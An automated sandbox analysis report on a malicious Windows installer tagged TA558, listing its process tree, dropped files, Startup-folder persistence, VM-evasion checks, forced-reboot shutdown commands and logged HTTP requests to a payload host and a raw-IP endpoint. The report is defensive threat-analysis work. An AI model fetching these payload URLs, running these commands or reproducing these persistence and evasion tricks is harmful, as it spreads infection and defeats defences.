Edit tour

Windows Analysis Report
DRTO10179793.msi

Overview

General Information

Sample Name:	DRTO10179793.msi
Analysis ID:	777332
MD5:	32c752eed98197d9d401a1054bd39009
SHA1:	55371da49cc341e585735c2616c26676c8a95a56
SHA256:	03e6328bcd5a3e48de00c5512d47d2e11c652348aad299d118e9063142d8aff0
Tags:	msiTA558
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic

Uses shutdown.exe to shutdown or reboot the system

Drops PE files to the user root directory

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

Checks for available system drives (often done to infect USB drives)

Drops PE files to the user directory

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 1508 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\DRTO10179793.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 5652 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 3628 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B01AEABFCA46B3B3EA82AAB1A28EDDAD MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cmd.exe (PID: 1556 cmdline: "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 5468 cmdline: shutdown -r -f -t 60 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

cmd.exe (PID: 5504 cmdline: "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 4968 cmdline: shutdown /r /t 1 /f MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

fQQPwD.exe (PID: 2716 cmdline: "C:\Users\user\fQQPwD.exe" MD5: E90BBFCDFDA75CB22FEDF1B94F8F20F6)

cleanup

Snort Signatures

ETPRO MALWARE TakeMyFile Installer Checkin - Source IP: 192.168.2.7 - Destination IP: 54.205.202.31

Timestamp:	192.168.2.754.205.202.3149713802849813 01/03/23-16:29:51.133243
SID:	2849813
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE TakeMyFile User-Agent - Source IP: 192.168.2.7 - Destination IP: 54.205.202.31

Timestamp:	192.168.2.754.205.202.3149713802849814 01/03/23-16:29:51.133243
SID:	2849814
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)Host: collect.installeranalytics.comContent-Length: 168Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: mzrdmodlonnce.s3.amazonaws.com

Source: global traffic	HTTP traffic detected: GET /digivolve.msi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: mzrdmodlonnce.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /megazord2023/index.php HTTP/1.1User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"Host: 20.203.138.85Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 3.5.17.120:443 -> 192.168.2.7:49710 version: TLS 1.2

Source: fQQPwD.exe, 00000010.00000002.505228008.00000000053CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI8958.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\412f31.msi

Jump to behavior

Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B2380	16_2_000B2380
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B3550	16_2_000B3550
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B1960	16_2_000B1960
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00074024	16_2_00074024
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B00C0	16_2_000B00C0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0006614D	16_2_0006614D
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B8180	16_2_000B8180
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000DD1E0	16_2_000DD1E0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000791F0	16_2_000791F0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000C01F0	16_2_000C01F0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00076214	16_2_00076214
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0009F250	16_2_0009F250
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0006626D	16_2_0006626D
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000C4280	16_2_000C4280
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000FF347	16_2_000FF347
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B6340	16_2_000B6340
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00066349	16_2_00066349
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000CB350	16_2_000CB350
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000CE37C	16_2_000CE37C
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000E637B	16_2_000E637B
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0007A3AC	16_2_0007A3AC
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00077468	16_2_00077468
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000624C0	16_2_000624C0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0009E4D0	16_2_0009E4D0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000AF530	16_2_000AF530
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00061540	16_2_00061540
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000DB5D0	16_2_000DB5D0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_00065650	16_2_00065650
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000BC650	16_2_000BC650
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000D1660	16_2_000D1660
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000B0670	16_2_000B0670
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_0006867D	16_2_0006867D
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000A56A0	16_2_000A56A0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000CC6A0	16_2_000CC6A0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000666D5	16_2_000666D5

Source: C:\Users\user\fQQPwD.exe

Code function: String function: 00076D4C appears 83 times

Source: DRTO10179793.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs DRTO10179793.msi
Source: DRTO10179793.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs DRTO10179793.msi
Source: DRTO10179793.msi	Binary or memory string: OriginalFilenameInstallerAnalytics.dllF vs DRTO10179793.msi
Source: DRTO10179793.msi	Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs DRTO10179793.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\DRTO10179793.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B01AEABFCA46B3B3EA82AAB1A28EDDAD
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f
Source: unknown	Process created: C:\Users\user\fQQPwD.exe "C:\Users\user\fQQPwD.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B01AEABFCA46B3B3EA82AAB1A28EDDAD	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f	Jump to behavior

Source: C:\Users\user\fQQPwD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: fQQPwD.lnk.2.dr

LNK file: ..\..\..\..\..\..\..\fQQPwD.exe

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Companhia DIGITAL A.C.T

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF6CB6C88574AEC173.TMP

Jump to behavior

Source: shi7C43.tmp.2.dr

Binary string: o\Device\NameResTrk\RecordNrtCloneOpenPacketW

Source: classification engine

Classification label: mal60.rans.evad.winMSI@15/41@3/3

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\fQQPwD.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: DRTO10179793.msi

Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Users\user\fQQPwD.exe	Mutant created: \Sessions\1\BaseNamedObjects\aaa22225Adx,Avrrthr@232323

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DRTO10179793.msi

Static file information: File size 3409408 > 1048576

Source:	Binary string: wininet.pdb source: shi7C43.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: DRTO10179793.msi, 412f31.msi.1.dr
Source:	Binary string: D:\a\_work\e\src\out\Release\identity_helper.exe.pdbOGP source: fQQPwD.exe, 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmp, fQQPwD.exe, 00000010.00000000.309976428.0000000000106000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr
Source:	Binary string: D:\a\_work\e\src\out\Release\identity_helper.exe.pdb source: fQQPwD.exe, 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmp, fQQPwD.exe, 00000010.00000000.309976428.0000000000106000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: d3d12.pdbUGP source: shi7D6D.tmp.2.dr
Source:	Binary string: d3d12.pdb source: shi7D6D.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr
Source:	Binary string: wininet.pdbUGP source: shi7C43.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: DRTO10179793.msi, 412f31.msi.1.dr, MSI8E3C.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: DRTO10179793.msi, 412f31.msi.1.dr, MSI8E3C.tmp.1.dr

Source: shi7C43.tmp.2.dr	Static PE information: section name: .wpp_sf
Source: shi7C43.tmp.2.dr	Static PE information: section name: .didat
Source: shi7D6D.tmp.2.dr	Static PE information: section name: .text_hf
Source: shi7D6D.tmp.2.dr	Static PE information: section name: .didat
Source: shi7D6D.tmp.2.dr	Static PE information: section name: .DDIData
Source: digimn.bz2.2.dr	Static PE information: section name: .00cfg
Source: digimn.bz2.2.dr	Static PE information: section name: .voltbl
Source: digimn.bz2.2.dr	Static PE information: section name: malloc_h

Source: shi7C43.tmp.2.dr

Static PE information: 0x84CD8294 [Wed Aug 8 17:47:00 2040 UTC]

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2			Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8958.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\shi7D6D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA577.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8D6F.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI90BD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8E3C.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\shi7C43.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI91B8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\fQQPwD.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F39.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9E0F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI96CA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9796.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8958.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA577.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8D6F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI90BD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8E3C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI91B8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F39.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9E0F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI96CA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9796.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\fQQPwD.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\fQQPwD.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQQPwD.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQQPwD.lnk

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\msiexec.exe TID: 6136	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\fQQPwD.exe TID: 5592	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\fQQPwD.exe TID: 4560	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\fQQPwD.exe TID: 2224	Thread sleep count: 9626 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\fQQPwD.exe	Last function: Thread delayed
Source: C:\Users\user\fQQPwD.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi7D6D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI90BD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI8E3C.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi7C43.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI96CA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9796.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\garurumon.bz2	Jump to dropped file

Source: C:\Users\user\fQQPwD.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\fQQPwD.exe

Window / User API: threadDelayed 9626

Jump to behavior

Source: C:\Users\user\fQQPwD.exe

